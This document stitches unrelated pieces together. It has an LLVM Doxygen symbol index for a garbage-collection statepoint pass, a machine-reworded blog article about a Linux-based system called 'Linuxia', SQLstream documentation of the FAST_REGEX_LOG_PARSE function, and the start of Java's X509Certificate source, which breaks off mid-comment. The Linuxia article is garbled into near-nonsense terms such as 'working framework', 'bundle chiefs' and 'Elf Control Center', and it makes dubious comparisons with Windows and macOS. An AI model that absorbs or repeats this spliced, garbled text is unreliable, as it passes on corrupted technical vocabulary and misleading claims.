bool runOnFunction(Function &F, DominatorTree &, TargetTransformInfo &, const TargetLibraryInfo &) Optional< uint32_t > NumPatchBytes Definition: Statepoint.h:438 Represent the analysis usage information of a pass. static Type * getVoidTy(LLVMContext &C) Definition: Type.cpp:165 bool any_of(R &&range, UnaryPredicate P) Provide wrappers to std::any_of which take ranges instead of having to pass begin/end explicitly... Definition: STLExtras.h:1172 RematerializedValueMapTy RematerializedValues Record live values we are rematerialized instead of relocating. constexpr double e Definition: MathExtras.h:57 void setCallingConv(CallingConv::ID CC) Definition: InstrTypes.h:1348 amdgpu Simplify well known AMD library false FunctionCallee Value * Arg static FunctionType * get(Type *Result, ArrayRef< Type *> Params, bool isVarArg) This static method is the primary way of constructing a FunctionType. Definition: Type.cpp:301 A specialization of it&#39;s base class for read-write access to a gc.statepoint. Definition: Statepoint.h:305 Interval::pred_iterator pred_end(Interval *I) Definition: Interval.h:115 static void print(raw_ostream &Out, object::Archive::Kind Kind, T Val) self_iterator getIterator() Definition: ilist_node.h:81 std::pair< NoneType, bool > insert(const T &V) insert - Insert an element into the set if it isn&#39;t already there. Definition: SmallSet.h:180 static void stripNonValidData(Module &M) The IR fed into RewriteStatepointsForGC may have had attributes and metadata implying dereferenceabil... void setTailCallKind(TailCallKind TCK) const Function * getFunction() const Return the function this instruction belongs to. Definition: Instruction.cpp:59 lazy value info static bool containsGCPtrType(Type *Ty) Returns true if this type contains a gc pointer whether we know how to handle that type or not... auto remove_if(R &&Range, UnaryPredicate P) -> decltype(adl_begin(Range)) Provide wrappers to std::remove_if which take ranges instead of having to pass begin/end explicitly... Definition: STLExtras.h:1205 LLVMContext & getContext() const getContext - Return a reference to the LLVMContext associated with this function. ... Definition: Function.cpp:205 static StringRef getDeoptLowering(CallBase *Call) static UndefValue * get(Type *T) Static factory methods - Return an &#39;undef&#39; object of the specified type. Definition: Constants.cpp:1446 const Value * stripPointerCasts() const Strip off pointer casts, all-zero GEPs and address space casts. Definition: Value.cpp:529 iterator erase(const_iterator CI) Definition: SmallVector.h:434 static PreservedAnalyses all() Construct a special preserved set that preserves all passes. Definition: PassManager.h:159 Attribute getAttribute(unsigned Index, Attribute::AttrKind Kind) const Return the attribute object that exists at the given index. static void findLiveSetAtInst(Instruction *inst, GCPtrLivenessData &Data, StatepointLiveSetTy &out) Given results from the dataflow liveness computation, find the set of live Values at a particular ins... size_t size() const Definition: SmallVector.h:52 Value * getIncomingValue(unsigned i) const Return incoming value number x. bool hasFnAttr(Attribute::AttrKind Kind) const Determine whether this call has the given attribute. Definition: InstrTypes.h:1373 auto find(R &&Range, const T &Val) -> decltype(adl_begin(Range)) Provide wrappers to std::find which take ranges instead of having to pass begin/end explicitly... Definition: STLExtras.h:1186 static PointerType * getInt8PtrTy(LLVMContext &C, unsigned AS=0) Definition: Type.cpp:224 static Value * findBaseOrBDV(Value *I, DefiningValueMapTy &Cache) Return a base pointer for this value if known. INITIALIZE_PASS_END(RegBankSelect, DEBUG_TYPE, "Assign register bank of generic virtual registers", false, false) RegBankSelect #define llvm_unreachable(msg) Marks that the current location is not supposed to be reachable. void setMetadata(unsigned KindID, MDNode *Node) Set the metadata of the specified kind to the specified node. Definition: Metadata.cpp:1222 Type * getAllocatedType() const Return the type that is being allocated by the instruction. Definition: Instructions.h:105 static bool shouldRewriteStatepointsIn(Function &F) Returns true if this function should be rewritten by this pass. void sort(IteratorTy Start, IteratorTy End) Definition: STLExtras.h:1095 iterator_range< T > make_range(T x, T y) Convenience function for iterating over sub-ranges. bool isPtrOrPtrVectorTy() const Return true if this is a pointer type or a vector of pointer types. Definition: Type.h:227 std::pair< iterator, bool > insert(const std::pair< KeyT, ValueT > &KV) Definition: MapVector.h:117 static cl::opt< bool > PrintBasePointers("spp-print-base-pointers", cl::Hidden, cl::init(false)) static cl::opt< bool > AllowStatepointWithNoDeoptInfo("rs4gc-allow-statepoint-with-no-deopt-info", cl::Hidden, cl::init(true)) A SetVector that performs no allocations if smaller than a certain size. Definition: SetVector.h:297 This pass provides access to the codegen interfaces that are needed for IR-level transformations. arg_iterator gc_args_end() const Definition: Statepoint.h:242 AttrBuilder & removeAttribute(Attribute::AttrKind Val) Remove an attribute from the builder. bool callsGCLeafFunction(const CallBase *Call, const TargetLibraryInfo &TLI) Return true if this call calls a gc leaf function. Definition: Local.cpp:2515 This is a &#39;vector&#39; (really, a variable-sized array), optimized for the case when the array is small... Definition: SmallVector.h:837 static BDVState meetBDVState(const BDVState &LHS, const BDVState &RHS) bool dominates(const Instruction *Def, const Use &U) const Return true if Def dominates a use in User. Definition: Dominators.cpp:248 Module.h This file contains the declarations for the Module class. Provides information about what library functions are available for the current target. iterator end() const Definition: ArrayRef.h:137 Indicates that this statepoint is a transition from GC-aware code to code that is not GC-aware... LLVM_NODISCARD T pop_back_val() Definition: SmallVector.h:374 ConstantInt * getInt32(uint32_t C) Get a constant 32-bit value. Definition: IRBuilder.h:343 static GCRegistry::Add< StatepointGC > D("statepoint-example", "an example strategy for statepoint") static BasicBlock * normalizeForInvokeSafepoint(BasicBlock *BB, BasicBlock *InvokeParent, DominatorTree &DT) static PHINode * Create(Type *Ty, unsigned NumReservedValues, const Twine &NameStr="", Instruction *InsertBefore=nullptr) Constructors - NumReservedValues is a hint for the number of incoming edges that this phi node will h... FunctionCallee getOrInsertFunction(StringRef Name, FunctionType *T, AttributeList AttributeList) Look up the specified function in the module symbol table. Definition: Module.cpp:143 unsigned getNumIncomingValues() const Return the number of incoming edges. AttributeList getAttributes() const Return the parameter attributes for this call. Definition: InstrTypes.h:1366 static const Function * getCalledFunction(const Value *V, bool LookThroughBitCast, bool &IsNoBuiltin) void set_subtract(const STy &S) Compute This := This - B TODO: We should be able to use set_subtract from SetOperations.h, but SetVector interface is inconsistent with DenseSet. Definition: SetVector.h:260 Value handle that asserts if the Value is deleted. Definition: ValueHandle.h:237 Intrinsic::ID getIntrinsicID() const LLVM_READONLY getIntrinsicID - This method returns the ID number of the specified function, or Intrinsic::not_intri... Definition: Function.h:193 raw_ostream & dbgs() dbgs() - This returns a reference to a raw_ostream for debugging messages. Definition: Debug.cpp:132 unsigned getVectorNumElements() const Definition: DerivedTypes.h:566 static bool ClobberNonLive A range adaptor for a pair of iterators. Class to represent vector types. Definition: DerivedTypes.h:432 static std::string suffixed_name_or(Value *V, StringRef Suffix, StringRef DefaultName) const Module * getModule() const Return the module owning the function this instruction belongs to or nullptr it the function does not... Definition: Instruction.cpp:55 MapVector< AssertingVH< Instruction >, AssertingVH< Value > > RematerializedValueMapTy bool isStatepointDirectiveAttr(Attribute Attr) Return true if the Attr is an attribute that is a statepoint directive. Definition: Statepoint.cpp:54 Optional< uint64_t > StatepointID Definition: Statepoint.h:439 iterator_range< user_iterator > users() Definition: Value.h:419 static const uint64_t DefaultStatepointID Definition: Statepoint.h:441 void FoldSingleEntryPHINodes(BasicBlock *BB, MemoryDependenceResults *MemDep=nullptr) We know that BB has one predecessor. iterator insert(iterator I, T &&Elt) Definition: SmallVector.h:467 const Value * getFalseValue() const LLVM_NODISCARD bool equals(StringRef RHS) const equals - Check for string equality, this is more efficient than compare() when the relative ordering ... Definition: StringRef.h:174 Call sites that get wrapped by a gc.statepoint (currently only in RewriteStatepointsForGC and potenti... Definition: Statepoint.h:437 User::op_iterator arg_begin() Return the iterator pointing to the beginning of the argument list. Definition: InstrTypes.h:1206 bool operator!=(uint64_t V1, const APInt &V2) Definition: APInt.h:1977 static void CreateGCRelocates(ArrayRef< Value *> LiveVariables, const int LiveStart, ArrayRef< Value *> BasePtrs, Instruction *StatepointToken, IRBuilder<> Builder) Helper function to place all gc relocates necessary for the given statepoint. bool hasValue() const Definition: Optional.h:259 unsigned getNumUses() const This method computes the number of uses of this Value. Definition: Value.cpp:160 bool hasGC() const hasGC/getGC/setGC/clearGC - The name of the garbage collection algorithm to use during code generatio... Definition: Function.h:351 static void findLiveReferences(Function &F, DominatorTree &DT, ArrayRef< CallBase *> toUpdate, MutableArrayRef< struct PartiallyConstructedSafepointRecord > records) static cl::opt< bool > PrintLiveSetSize("spp-print-liveset-size", cl::Hidden, cl::init(false)) bool empty() const Return true if the builder contains no target-independent attributes. Definition: Attributes.h:828 LLVM_NODISCARD bool empty() const Definition: SmallVector.h:55 StringRef getValueAsString() const Return the attribute&#39;s value as a string. Definition: Attributes.cpp:223 static VectorType * get(Type *ElementType, ElementCount EC) This static method is the primary way to construct an VectorType. Definition: Type.cpp:614 StringRef getName() const Return a constant reference to the value&#39;s name. Definition: Value.cpp:214 static bool isUnhandledGCPointerType(Type *Ty) BasicBlock * getIncomingBlock(unsigned i) const Return incoming basic block number i. Function * getCalledFunction() const Returns the function called, or null if this is an indirect function invocation. Definition: InstrTypes.h:1287 void insertAfter(Instruction *InsertPos) Insert an unlinked instruction into a basic block immediately after the specified instruction... Definition: Instruction.cpp:79 unsigned pred_size(const BasicBlock *BB) Get the number of predecessors of BB. Definition: CFG.h:121 #define I(x, y, z) Definition: MD5.cpp:58 bool empty() const Determine if the SetVector is empty or not. Definition: SetVector.h:72 static GCRegistry::Add< ErlangGC > A("erlang", "erlang-compatible garbage collector") ModulePass class - This class is used to implement unstructured interprocedural optimizations and ana... Definition: Pass.h:224 static void findBasePointers(const StatepointLiveSetTy &live, MapVector< Value *, Value *> &PointerToBase, DominatorTree *DT, DefiningValueMapTy &DVCache) iterator_range< value_op_iterator > operand_values() Definition: User.h:261 void setAttributes(AttributeList A) Set the parameter attributes for this call. Definition: InstrTypes.h:1370 LLVM_NODISCARD std::enable_if<!is_simple_type< Y >::value, typename cast_retty< X, const Y >::ret_type >::type dyn_cast(const Y &Val) Definition: Casting.h:332 ilist_iterator< OptionsT, !IsReverse, IsConst > getReverse() const Get a reverse iterator to the same node. void preserve() Mark an analysis as preserved. Definition: PassManager.h:174 static void insertRematerializationStores(const RematerializedValueMapTy &RematerializedValues, DenseMap< Value *, AllocaInst *> &AllocaMap, DenseSet< Value *> &VisitedLiveValues) CallInst * CreateCall(FunctionType *FTy, Value *Callee, ArrayRef< Value *> Args=None, const Twine &Name="", MDNode *FPMathTag=nullptr) Definition: IRBuilder.h:2240 static Attribute get(LLVMContext &Context, AttrKind Kind, uint64_t Val=0) Return a uniquified Attribute object. Definition: Attributes.cpp:80 size_type count(const_arg_type_t< ValueT > V) const Return 1 if the specified key is in the set, 0 otherwise. Definition: DenseSet.h:91 static bool insertParsePoints(Function &F, DominatorTree &DT, TargetTransformInfo &TTI, SmallVectorImpl< CallBase *> &ToUpdate) bool removeUnreachableBlocks(Function &F, DomTreeUpdater *DTU=nullptr, MemorySSAUpdater *MSSAU=nullptr) Remove all blocks that can not be reached from the function&#39;s entry. Definition: Local.cpp:2214 raw_ostream & operator<<(raw_ostream &OS, const APInt &I) Definition: APInt.h:2047 size_type count(const_arg_type_t< KeyT > Val) const Return 1 if the specified key is in the map, 0 otherwise. Definition: DenseMap.h:145 bool isDeclaration() const Return true if the primary definition of this global value is outside of the current translation unit... Definition: Globals.cpp:231 Analysis pass providing the TargetLibraryInfo. assert(ImpDefSCC.getReg()==AMDGPU::SCC &&ImpDefSCC.isDef()) Represents calls to the gc.relocate intrinsic. Definition: Statepoint.h:360 Mark the deopt arguments associated with the statepoint as only being "live-in". Module * getParent() Get the module that this global value is contained inside of... Definition: GlobalValue.h:575 LLVM Value Representation. Definition: Value.h:73 A vector that has set insertion semantics. Definition: SetVector.h:40 succ_range successors(Instruction *I) Definition: CFG.h:259 static const Function * getParent(const Value *V) AttributeSet getFnAttributes() const The function attributes are returned. Attribute getFnAttribute(Attribute::AttrKind Kind) const Return the attribute for the given attribute kind. Definition: Function.h:333 MapVector< BasicBlock *, SetVector< Value * > > LiveOut Values live out of this basic block (i.e. This class implements an extremely fast bulk output stream that can only output to a stream... Definition: raw_ostream.h:45 void PromoteMemToReg(ArrayRef< AllocaInst *> Allocas, DominatorTree &DT, AssumptionCache *AC=nullptr) Promote the specified list of alloca instructions into scalar registers, inserting PHI nodes as appro... Invoke instruction. StringRef - Represent a constant reference to a string, i.e. Definition: StringRef.h:48 inst_range instructions(Function *F) Definition: InstIterator.h:133 A container for analyses that lazily runs them and caches their results. const LandingPadInst * getLandingPadInst() const Return the landingpad instruction associated with the landing pad. Definition: BasicBlock.cpp:475 Legacy analysis pass which computes a DominatorTree. Definition: Dominators.h:259 This pass exposes codegen information to IR-level passes. bool operator==(uint64_t V1, const APInt &V2) Definition: APInt.h:1975 MapVector< Value *, Value * > PointerToBase Mapping from live pointers to a base-defining-value. void setIncomingValue(unsigned i, Value *V) static void analyzeParsePointLiveness(DominatorTree &DT, GCPtrLivenessData &OriginalLivenessData, CallBase *Call, PartiallyConstructedSafepointRecord &Result) static ExtractElementInst * Create(Value *Vec, Value *Idx, const Twine &NameStr="", Instruction *InsertBefore=nullptr) #define LLVM_DEBUG(X) Definition: Debug.h:122 bool isEmpty() const Return true if there are no attributes. Definition: Attributes.h:669 InstListType::reverse_iterator reverse_iterator Definition: BasicBlock.h:91 MDNode * createMutableTBAAAccessTag(MDNode *Tag) Return mutable version of the given mutable or immutable TBAA access tag. Definition: MDBuilder.cpp:278 bool use_empty() const Definition: Value.h:342 LocationClass< Ty > location(Ty &L) Definition: CommandLine.h:448 static AttributeList get(LLVMContext &C, ArrayRef< std::pair< unsigned, Attribute >> Attrs) Create an AttributeList with the specified parameters in it. Definition: Attributes.cpp:973 iterator_range< arg_iterator > args() Definition: Function.h:719 bool empty() const empty - Check if the array is empty. Definition: ArrayRef.h:143 A wrapper class for inspecting calls to intrinsic functions. Definition: IntrinsicInst.h:43 const BasicBlock * getParent() const Definition: Instruction.h:66 an instruction to allocate memory on the stack Definition: Instructions.h:59 static BaseDefiningValueResult findBaseDefiningValue(Value *I) Helper function for findBasePointer - Will return a value which either a) defines the base pointer fo... An analysis over an "outer" IR unit that provides access to an analysis manager over an "inner" IR un... Definition: PassManager.h:1044 bool is_contained(R &&Range, const E &Element) Wrapper function around std::find to detect if an element exists in a container. Definition: STLExtras.h:1224 unsigned gcArgsStartIdx() const Definition: Statepoint.h:244
__label__pos
0.633013
Technology Linuxia: How It Works and What It Can Do Linuxia is an open-source working framework in light of the Linux portion, which is the central part that deals with the correspondence between the equipment and the product of the PC. Linuxia is one of the numerous disseminations or variations of Linux, each with its own highlights, plan, and reasoning. Linuxia is intended to be a free, strong, and secure working framework that can run on various gadgets, from servers to work areas to installed frameworks. In this article, we will investigate how Linuxia works and how it can help you. We will cover the essential parts of Linuxia, like the pieces, the shell, and the document framework. We will likewise depict how Linuxia collaborates with the equipment and programming of the PC, and how it thoroughly analyzes other working frameworks, like Windows and MacOS. At long last, we will grasp a portion of the normal and high-level utilizations of Linuxia, like web servers, work area conditions, and installed frameworks. We will likewise feature some of the highlights and instruments that Linuxia offers, such as bundle chiefs, order line utilities, and graphical UIs. We will likewise exhibit a portion of how Linuxia can be tweaked and designed to suit different client needs and inclinations. How Linuxia Functions Linuxia is made up of a few parts that cooperate to provide a practical and easy-to-understand working framework. The principal parts are: The bit The part is the core of Linuxia, as it controls the essential tasks of the PC, for example, memory on the board, process planning, input/yield gadgets, network points of interaction, and security. The bit is written in C and low-level computing constructs, and it tends to be gathered for various designs, for example, x86, ARM, and MIPS. The part can likewise be adjusted and refreshed by clients, as it is open-source and conveyed under the GNU Overall Population Permit (GPL). The shell  The shell is the point of interaction between the client and the portion, as it permits the client to execute orders and projects on the PC. The shell can be either graphical or printed, contingent upon the client’s inclination and the gadget’s abilities. Linuxia upholds different shells, like Slam, Zsh, and Fish, each with its grammar, elements, and customization choices. The shell can likewise run scripts, which are documents that contain a progression of orders that can be executed accordingly. The record framework The document framework is the way that Linuxia puts together and stores the information on the PC, like documents, registries, and allotments. Linuxia upholds different record frameworks, like Ext4, Btrfs, and XFS, each with its own benefits and disadvantages. The record framework can likewise be encoded, compacted, and supported utilizing different apparatuses and techniques. Linuxia communicates with the equipment and programming of the PC through a progression of layers, like drivers, libraries, and applications. Drivers are programs that permit the bit to speak with the equipment gadgets, like the console, the mouse, the screen, and the printer. Libraries are assortments of capabilities and information that can be utilized by different projects, like the C standard library, the GTK library, and the OpenGL library. Applications are programs that perform explicit undertakings for the client, like the Firefox program, the LibreOffice suite, and the GIMP supervisor. Linuxia is not quite the same as other working frameworks, like Windows and MacOS, in more ways than one, for example, • Linuxia is free and open-source, and that implies that anybody can utilise, adjust, and disperse it without paying any expenses or sovereignties. Windows and MacOS are exclusive and shut source, and that implies that they are claimed and constrained by their separate organizations and that clients need to pay for licenses and updates. • – Linuxia is measured and adaptable, and that implies that clients can pick and change the parts and highlights of the working framework as indicated by their requirements and inclinations. Windows and MacOS are solid and normalized, and that implies that they have a fixed and uniform design and appearance and that clients have restricted choices and adaptability. • – Linuxia is flexible and viable, and that implies that it can run on a large number of gadgets, from servers to work areas to inserted frameworks, and that it can uphold different configurations and conventions, like PDF, MP3, and HTTP. Windows and MacOS are particular and elite, and that implies that they are improved for explicit kinds of gadgets and that they have restricted help for different organizations and conventions. What Linuxia Can Do Linuxia can do numerous things for you, from fundamental errands to cutting-edge projects, contingent upon your objectives and abilities. Here are a few instances of what Linuxia can do: • – Linuxia can act as a web server, which is a PC that hosts and conveys site pages and other content over the web. Linuxia can run different web server programming, like Apache, Nginx, and Lighttpd, and it can deal with different web innovations, like PHP, Python, and Ruby. Linuxia can likewise run different web applications, like WordPress, Drupal, and Joomla, which permit clients to make and oversee sites and online journals. • – Linuxia can act as a work area climate, which is a graphical UI that gives clients an agreeable and helpful method for collaborating with the PC. Linuxia can run different work area conditions, like Dwarf, KDE, and XFCE, each with its own look and beliefs, and its own arrangement of uses and utilities. Linuxia can likewise run different window supervisors, like Compiz, Openbox, and i3, which control the appearance and conduct of the windows on the screen. Also, read more What is Integremos and Why do You Need It Now? • – Linuxia can act as an installed framework, which is a PC that is incorporated into a bigger gadget or framework, like a switch, a camera, or a vehicle. Linuxia can run on different inserted stages, like Raspberry Pi, Arduino, and BeagleBone, and it can carry out different roles, like mechanization, observation, and amusement. Linuxia can likewise run different installed applications, like OpenWrt, Movement, and Kodi, which give clients explicit elements and administrations. Linuxia offers many highlights and apparatuses that can upgrade your experience and efficiency, for example, Bundle administrators Bundle directors are programs that permit clients to introduce, update, and eliminate programming bundles on the PC. Linuxia has different bundle directors, for example, Able, YUM, and Pacman, each with its own orders and vaults. Bundle chiefs can likewise determine conditions, which are the necessities and conditions that a product bundle requires to appropriately work. Order line utilities Order line utilities are programs that can be executed from the shell, and that can perform different errands, for example, record control, text handling, and framework organization. Linuxia has different order line utilities, like ls, grep, and sudo, each with its own choices and contentions. Order line utilities can likewise be joined and channelled, and that implies that the result of one utility can be utilized as the contribution of another utility. Graphical UIs Graphical UIs are programs that give clients a visual and intuitive method for utilizing the PC, like menus, buttons, and symbols. Linuxia has different graphical UIs, like record directors, content managers, and picture watchers, each with its own elements and capabilities. Graphical UIs can likewise be redone and themed, and that implies that clients can change the appearance and format of the point of interaction. Linuxia can be tweaked and arranged to suit different client needs and inclinations, for example, Piece boundaries Part boundaries are settings that control the way of behaving and execution of the portion, like how much memory, the recurrence of the processor, and the need for the cycles. Portion boundaries can be changed by altering the arrangement records, for example,/and so on/sysctl.conf and/and so on/default/grub, or by utilizing the sysctl and grub orders. Shell choices Shell choices are settings that control the way of behaving and the presence of the shell, like the brief, the assumed names, and the set of experiences. Shell choices can be changed by altering the arrangement documents, for example, ~/.bashrc and ~/.zshrc, or by utilizing the set and product orders. Work area inclinations Work area inclinations are settings that control the way of behaving and the presence of the work area climate, like the backdrop, the symbols, and the text styles. Work area inclinations can be changed by utilizing the graphical instruments, for example, the Elf Control Center and the KDE Framework Settings, or by altering the arrangement documents, for example, ~/.config and ~/.nearby. Conclusion Linuxia is a free and open-source working framework in view of the Linux portion, that can run on different gadgets, from servers to work areas to implanted frameworks. Linuxia works by utilizing a few parts, like the portion, the shell, and the document framework, that connect with the equipment and programming of the PC. Linuxia can do numerous things for you, from fundamental undertakings to cutting-edge projects, contingent upon your objectives and abilities. Linuxia offers many elements and devices that can improve your experience and efficiency, for example, bundle administrators, order line utilities, and graphical UIs. Linuxia can likewise be tweaked and designed to suit different client needs and inclinations, like piece boundaries, shell choices, and work area inclinations. Linuxia is a strong and secure option in contrast to other working frameworks, for example, Windows and MacOS, that can give you flexibility, similarity, and customization. Linuxia is likewise a tomfoolery and remunerating working framework that can provoke you to master new abilities and investigate additional opportunities. About author Articles 👋 Hi, I'm Jennifer! With over 🖋️ five years of blogging experience, I've dived deep into 🔍 high-demand niches. My 🏆 high certifications underline my dedication and expertise in this realm. 💼 Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.874878
 Integrating Blaze with Other Systems > Appendix A: Legacy Adapters and Agents > Log File Adapter > FAST_REGEX_LOG_PARSE FAST_REGEX_LOG_PARSE << Click to Display Table of Contents >> Navigation:  Integrating Blaze with Other Systems > Appendix A: Legacy Adapters and Agents > Log File Adapter > FAST_REGEX_LOG_PARSE Previous pageReturn to chapter overviewNext page Note: This topic describes a legacy adapter. Unless you have used these in the past, we recommend using the Extensible Common Data Adapter and Agent instead of these legacy adapters and agents. General Syntax:  FAST_REGEX_LOG_PARSE('input_string', 'fast_regex_pattern') The FAST_REGEX_LOG_PARSE works by first decomposing the regular expression into a series of regular expressions, one for each expression inside a group and one for each expression outside a group. Any fixed length portions at the start of any expressions are moved to the end of the previous expression. If any expression is entirely fixed length, it is merged with the previous expression. The series of expressions is then evaluated using lazy semantics with no backtracking. (In regular expression parsing parlance, "lazy" means don't parse more than you need to at each step. "Greedy" means parse as much as you can at each step. "Backtracking" means if something doesn't match the expression, you go back and start at the previous level of expression) The columns returned will be COLUMN1 through COLUMNn, where n is the number of groups in the regular expression. The columns will be of type varchar(1024).  See sample usage below at First FRLP Example and at Further FRLP Examples. A list of the parsing functions and examples of using them can be found in the topic Log File Adapter in the s-Server Integration Guide. See also the topic REGEX_LOG_PARSE in this guide, as well as the topic LogFileAdapter. Description for FAST_REGEX_LOG_PARSER (FRLP) FAST_REGEX_LOG_PARSER uses a lazy search - it stops at the first match. By contrast, the default java regex_parser is greedy unless possessive quantifiers are used. FAST_REGEX_LOG_PARSE scans the supplied input string for all the characters specified by the fast_regex_pattern. All characters in that input string must be accounted for by the characters and scan groups defined in the fast_regex_pattern. Scan groups define the fields-or-columns resulting when a scan is successful. If all characters in the input_string are accounted for when the fast_regex_pattern is applied, then FRLP creates an output field (column) from each parenthetical expression in that fast_regex_pattern, in left-to-right order: The first (leftmost) parenthetical expression creates the first output field, the second parenthetical expression creates the second output field, up through the last parenthetical expression creating the last output field. If the supplied input_string contains any characters not accounted for (matched) by applying fast_regex_pattern, then FRLP returns no fields at all.   First FRLP Example 0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . . .> (values (FAST_REGEX_LOG_PARSE('Mary_had_a_little_lamb', '(.*)_(._.*)_.*'))) t(r); +-------------------------+-----------------------+ |         COLUMN1         |         COLUMN2       | +-------------------------+-----------------------+ | Mary_had                | a_little              | +-------------------------+-----------------------+ 1 row selected 1.The scan of input_string ('Mary_had_a_little_lamb') begins with the 1st group defined in fast_regex_pattern:  (.*), which means "find any character 0 or more times." This group specification, defining the first field or column desired, causes FRLP to begin accepting or gathering input_string characters starting from the input_string's first character until it finds the next group in fast_regex_pattern or the next literal character-or-string that is not inside a group. In this example's input_string, the next such literal character after the first group specification is an underscore. 2.Each character in the input_string is scanned until the next specification in this example's fast_regex_pattern is found:  an underscore. The first underscore shown in the fast_regex_pattern is outside any group specification (defined by enclosing parentheses). Such character-strings or literals specified in the fast_regex_pattern but not inside a group must be found in the input_string but will not be included in any output field. 3.The next thing sought is group 2, (._.*), which means any 3-character string with an underscore in the middle followed by at least one more character. The first occurrence of such a group-2 string within the input_string is at "a_l". Finding a group-2 match defines what will become the contents of the first (group-1) output field:  "Mary_had". (The underscore following is not a part of any output group/field.) 4.Group-2 thus begins with "a_l".  Where does it end? The remaining specification in the fast_regex_pattern is (_.*):  an underscore followed by any number of other characters. That specification is matched by "_little_lamb" after which the input_string ends, meeting the requirement that all input_string characters be accounted for. So group-2 begins with "a_l" and includes all remaining characters in the input_string.  Thus the second field/column contains  "a_little_lamb". Note that if the fast_regex_pattern had omitted the final asterisk, no results would be obtained:   0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . . .> (values (REGEX_LOG_PARSE('Mary_had_a_little_lamb', '(.*)_(._.*)_'))) t(r); +----------+----------+ | COLUMN1  | COLUMN2  | +----------+----------+ +----------+----------+ No rows selected   Why?  Because this fast_regex_pattern says the input string ends with an underscore with no characters after it.  So upon encountering the underscore after "little", the parser expects no more characters but instead finds there are more, which violates the first rule: All characters in that input string must be accounted for by the characters and scan groups defined in the fast_regex_pattern. Further Examples The next example uses a "+", which means repeat the last expression 1 or more times ("*" means 0 or more times). A.  In this case, the longest prefix is the first underscore. The first field/column group will match on "Mary" and the second will not match. 0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . . .> (values (FAST_REGEX_LOG_PARSE('Mary_had_a_little_lamb', '(.*)_+(._.*)'))) t(r); +----------+----------+ | COLUMN1  | COLUMN2  | +----------+----------+ +----------+----------+ No rows selected   The above example returns no fields because the "+" required there be at least one more underscore-in-a-row; and the input_string does not have that.   B.  In the following case, the '+' is superfluous because of the lazy semantics: 0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . . .> (values (FAST_REGEX_LOG_PARSE('Mary____had_a_little_lamb', '(.*)_+(.*)'))) t(r); +-------------------------+-------------------------+ |         COLUMN1         |         COLUMN2         | +-------------------------+-------------------------+ | Mary                    |    had_a_little_lamb    | +-------------------------+-------------------------+ 1 row selected   The above example succeeds in returning two fields because after finding the multiple underscores required by the "_+" specification, the group-2 specification (.*) accepts all remaining characters in the .input_string. Underscores do not appear trailing "Mary" nor leading "had" because the "_+" specification is not enclosed in parentheses. As mentioned in the introduction, "lazy" in regular expression parsing parlance means don't parse more than you need to at each step. "Greedy" means parse as much as you can at each step. The first case in this topic, A, fails because when it gets to the first underscore, the regex processor has no way of knowing without backtracking that it can't use the underscore to match "_+", and FRLP doesn't backtrack, whereas REGEX_LOG_PARSE does. The search directly above, B, gets turned into three searches: (.*)_ _*(._ .*)   Notice that the second field group gets split between the second and third searches, also that "_+" is considered the same as "__*",  i.e., it considers "underscore repeat-underscore-1-or-more-times" the same as "underscore underscore repeat-underscore-0-or-more-times".) Case A demonstrates the main difference between REGEX_LOG_PARSE and FAST_REGEX_LOG_PARSE, because the search in A would work under REGEX_LOG_PARSE because that function would use backtracking. C.  In the following example, the plus is not superfluous, because the "<Alpha> (any alphabetic char) is fixed length thus will be used as a delimiter for the " +" search. 0: jdbc:sqlstream:engine:> select t.r."COLUMN1", t.r."COLUMN2" from . . . . . . . . . . . . .> (values (FAST_REGEX_LOG_PARSE('Mary____had_a_little_lamb', '(.*)_+(<Alpha>.*)'))) t(r); +----------------------------+----------------------------+ |          COLUMN1           |          COLUMN2           | +----------------------------+----------------------------+ | Mary                       | had_a_little_lamb          | +----------------------------+----------------------------+ 1 row selected     '(.*) +(<Alpha>.*)' gets converted into three regular expressions: '.* ' ' *<Alpha>' '.*$' Each is matched in turn using lazy semantics.   The following are defined: <Digit>= "[0-9]", <Upper> = "[A-Z]", <Lower> = "[a-z]", <ASCII> = "[\u0000-\u007F]", <Alpha> = "<Lower>|<Upper>", <Alnum> = "<Alpha>|<Digit>", <Punct> = "[!\"#$%&'()*+,-./:;<=>?@[\\\\\\]^_`{|}~]", <Blank> = "[ \t]", <Space> = "[ \t\n\f\r\u000B]", <Cntrl"> = "[\u0000-\u001F\u007F]", <XDigit> = "0-9a-fA-F", <Print> = "<Alnum>|<Punct>", <Graph> = "<Print>"   The columns returned will be COLUMN1 through COLUMNn, where n is the number of groups in the regular expression. The columns will be of type varchar(1024). Further References A list of the parsing functions and examples of using them can be found in the topic Log File Adapter in the s-Server Integration Guide. See also the REGEX_LOG_PARSE write-up in this SQL Reference Guide.
__label__pos
0.885271
1 /* 2 * Copyright (c) 1997, 2019, Oracle and/or its affiliates. All rights reserved. 3 * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. 4 * 5 * This code is free software; you can redistribute it and/or modify it 6 * under the terms of the GNU General Public License version 2 only, as 7 * published by the Free Software Foundation. Oracle designates this 8 * particular file as subject to the "Classpath" exception as provided 9 * by Oracle in the LICENSE file that accompanied this code. 10 * 11 * This code is distributed in the hope that it will be useful, but WITHOUT 12 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 13 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License 14 * version 2 for more details (a copy is included in the LICENSE file that 15 * accompanied this code). 16 * 17 * You should have received a copy of the GNU General Public License version 18 * 2 along with this work; if not, write to the Free Software Foundation, 19 * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. 20 * 21 * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA 22 * or visit www.oracle.com if you need additional information or have any 23 * questions. 24 */ 25 26 package java.security.cert; 27 28 import java.math.BigInteger; 29 import java.security.*; 30 import java.security.spec.*; 31 import java.util.Collection; 32 import java.util.Date; 33 import java.util.List; 34 import javax.security.auth.x500.X500Principal; 35 36 import sun.security.x509.X509CertImpl; 37 import sun.security.util.SignatureUtil; 38 39 /** 40 * <p> 41 * Abstract class for X.509 certificates. This provides a standard 42 * way to access all the attributes of an X.509 certificate. 43 * <p> 44 * In June of 1996, the basic X.509 v3 format was completed by 45 * ISO/IEC and ANSI X9, which is described below in 